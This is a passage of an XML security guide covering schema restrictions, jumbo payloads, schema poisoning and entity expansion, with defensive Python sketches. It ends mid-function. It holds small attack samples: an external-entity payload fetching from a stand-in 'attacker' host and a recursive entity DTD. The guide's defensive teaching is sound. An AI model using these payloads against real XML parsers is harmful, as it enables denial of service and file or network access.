  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type allows negative values, an attacker who provides a negative number might produce a negative result on the user’s account. To avoid that logical vulnerability, the schema should use &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; instead of &amp;lt;tt&amp;gt;integer&amp;lt;/tt&amp;gt;.&lt;br /&gt;
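&lt;br /&gt;
The same rule can be enforced in application code as a second line of defense. The following Python sketch refuses any quantity below one before computing the total. The function name &amp;lt;tt&amp;gt;total_price&amp;lt;/tt&amp;gt; is hypothetical and only illustrates the logic.&lt;br /&gt;

```python
from decimal import Decimal


def total_price(price, quantity):
    """Compute price * quantity, refusing quantities below one."""
    if quantity > 0:
        return Decimal(price) * quantity
    raise ValueError("quantity must be a positive integer")


total = total_price("10", 1)
try:
    total_price("10", -5)
    negative_rejected = False
except ValueError:
    negative_rejected = True
```

Without the check, the second call would return a total of -50, which is the negative result described above.&lt;br /&gt;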
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever using user controlled values as denominators in a division, developers should avoid allowing the number zero.  In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. There are specific data types for XML schemas that specifically avoid using the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element. &lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If a data type that admits zero is used instead, a denominator of zero may trigger an error.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that they are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
With this schema, setting the price to Infinity or NaN cannot cause errors in the underlying application, because validation rejects these values. If the data type allowed them, an attacker could exploit this issue.&lt;br /&gt;
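&lt;br /&gt;
Application code that parses numbers after validation deserves the same care, because the numeric types of a programming language may accept special values that the schema type rejects. For instance, Python's &amp;lt;tt&amp;gt;Decimal&amp;lt;/tt&amp;gt; type accepts NaN and Infinity. The sketch below rejects them explicitly. The function names are hypothetical.&lt;br /&gt;

```python
from decimal import Decimal, InvalidOperation


def parse_price(text):
    """Parse a price, rejecting NaN, Infinity, and non-numeric input."""
    try:
        value = Decimal(text)
    except InvalidOperation:
        raise ValueError("price is not a number") from None
    if not value.is_finite():
        raise ValueError("price must be a finite number")
    return value


def is_rejected(text):
    """Report whether parse_price refuses the given input."""
    try:
        parse_price(text)
    except ValueError:
        return True
    return False


price = parse_price("10.50")
special_values_rejected = [is_rejected(v) for v in ("NaN", "Infinity", "-Infinity")]
```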
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should be restricted to specific sets: traffic lights will have only three types of colors, only 12 months are available, and so on. It is possible that the schema has these restrictions in place for each element or attribute. This is the ideal whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element &amp;lt;tt&amp;gt;month&amp;lt;/tt&amp;gt; to 12 possible values:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''minLength''' value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''maxLength''' value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values are restricted to a certain specific length (let's say 8), this value can be specified as follows to be valid:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''length''' value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt; restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt;:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''pattern''' value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only values from &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; to &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed for an SSN.&lt;br /&gt;
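&lt;br /&gt;
The same expression can be reused in application code. A pattern in an XML schema must match the entire value, so the Python sketch below uses &amp;lt;tt&amp;gt;fullmatch&amp;lt;/tt&amp;gt; to mirror that behavior. The names &amp;lt;tt&amp;gt;SSN_PATTERN&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;is_valid_ssn&amp;lt;/tt&amp;gt; are hypothetical.&lt;br /&gt;

```python
import re

SSN_PATTERN = re.compile(r"[0-9]{3}-[0-9]{2}-[0-9]{4}")


def is_valid_ssn(value):
    """Return True only if the entire value matches the SSN pattern."""
    return SSN_PATTERN.fullmatch(value) is not None


checks = {
    "123-45-6789": is_valid_ssn("123-45-6789"),
    "123-45-67890": is_valid_ssn("123-45-67890"),
    "123456789": is_valid_ssn("123456789"),
}
```

Only the first value is accepted. The second has an extra digit and the third lacks the separators.&lt;br /&gt;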
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components, available in XML Schema 1.1, constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed. &lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an &amp;lt;tt&amp;gt;assertion&amp;lt;/tt&amp;gt; disallowing the number zero:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''assertion''' test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
Failing to define a maximum number of occurrences can force the application to cope with extreme numbers of items to be processed. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;0&amp;lt;/tt&amp;gt;, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;buy&amp;quot; maxOccurs=&amp;quot;unbounded&amp;quot;&amp;gt;&lt;br /&gt;
          &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
            &amp;lt;xs:all&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
            &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
          &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
        &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) number of &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; elements. This is a common finding, since developers do not normally want to restrict maximum numbers of occurrences. Applications using limitless occurrences should test what happens when they receive an extremely large number of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an unbounded value.&lt;br /&gt;
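&lt;br /&gt;
Where the schema cannot be changed, the application can apply its own ceiling. The Python sketch below counts the &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; elements of an already parsed document and refuses to continue above a limit. The function name and the limit of 1000 are assumptions for illustration. Since the count takes place after parsing, a limit expressed in the schema would still stop oversized input earlier.&lt;br /&gt;

```python
import xml.etree.ElementTree as ET


def enforce_max_occurs(parent, tag, limit):
    """Raise ValueError if parent holds more than limit children named tag."""
    count = len(parent.findall(tag))
    if count > limit:
        raise ValueError(f"{count} '{tag}' elements exceed the limit of {limit}")
    return count


operation = ET.Element("operation")
for _ in range(1500):
    ET.SubElement(operation, "buy")

try:
    enforce_max_occurs(operation, "buy", limit=1000)
    flood_rejected = False
except ValueError:
    flood_rejected = True
```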
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
* '''Depth attack''': using a huge number of elements, element names, and/or element values.&lt;br /&gt;
* '''Width attack''': using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;SOAPENV:ENVELOPE XMLNS:SOAPENV=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot; XMLNS:EXT=&amp;quot;HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAPENV:HEADER LARGENAME1=&amp;quot;LARGEVALUE&amp;quot; LARGENAME2=&amp;quot; LARGEVALUE&amp;quot; LARGENAME3=&amp;quot; LARGEVALUE&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE includeme [&lt;br /&gt;
  &amp;lt;!ENTITY file SYSTEM &amp;quot;http://attacker/huge.xml&amp;quot; &amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;includeme&amp;gt;&amp;amp;file;&amp;lt;/includeme&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document.&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the note element could be removed or altered, allowing any type of data to be sent to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read remote files from the server. This type of schema only serves as a suggestion for sending a document, and it must contain a way to check the integrity of the embedded schema before it can be used safely.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 &amp;lt;pre&amp;gt;-rw-rw-rw-  1 user  staff  743 Jan 15 12:32 note.dtd&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML document or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
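&lt;br /&gt;
A deployment script could flag this condition before the schema is used. The following Python sketch, which assumes a POSIX filesystem, reads the permission bits of a file and reports whether users other than the owner and group may write to it. The helper name &amp;lt;tt&amp;gt;is_world_writable&amp;lt;/tt&amp;gt; is hypothetical:&lt;br /&gt;

```python
import os
import stat


def is_world_writable(path):
    """Return True when users other than the owner and group may write to path."""
    # stat.filemode renders the mode like "ls -l" does, e.g. "-rw-rw-rw-".
    mode_string = stat.filemode(os.stat(path).st_mode)
    # Index 8 of that string is the write flag for "other" users.
    return mode_string[8] == "w"
```

Calling &amp;lt;tt&amp;gt;is_world_writable(&amp;quot;note.dtd&amp;quot;)&amp;lt;/tt&amp;gt; on a file with the permissions listed earlier would return &amp;lt;tt&amp;gt;True&amp;lt;/tt&amp;gt;.&lt;br /&gt;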
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text, so an attacker could sniff the connection and modify the schema before it reaches the end user:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;http://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy.&lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an Internet Protocol (IP) address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own IP addresses.&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like https://example.com/note.dtd. In a normal scenario, example.com resolves to the IP address 1.1.1.1:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 1.1.1.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 2.2.2.2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may actually be retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; references another entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is defined as a reference to entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, the schema describes a circular reference between entities:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;A&amp;gt;&amp;amp;A;&amp;lt;/A&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
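&lt;br /&gt;
One way to reason about such loops is to treat the entity definitions as a graph and look for a cycle. The Python sketch below assumes the references have already been extracted into a dictionary that maps each entity name to the entity names used in its replacement text. That representation and the function name are assumptions made for illustration, not how any particular parser stores entities:&lt;br /&gt;

```python
def has_circular_reference(references):
    """Return True when any entity can reach itself by following references.

    `references` maps an entity name to the list of entity names that
    appear in its replacement text.
    """
    finished = set()  # entities fully explored without finding a loop

    def visit(name, active):
        if name in active:
            return True   # name is already being expanded: a loop
        if name in finished:
            return False
        active.add(name)
        for child in references.get(name, []):
            if visit(child, active):
                return True
        active.discard(name)
        finished.add(name)
        return False

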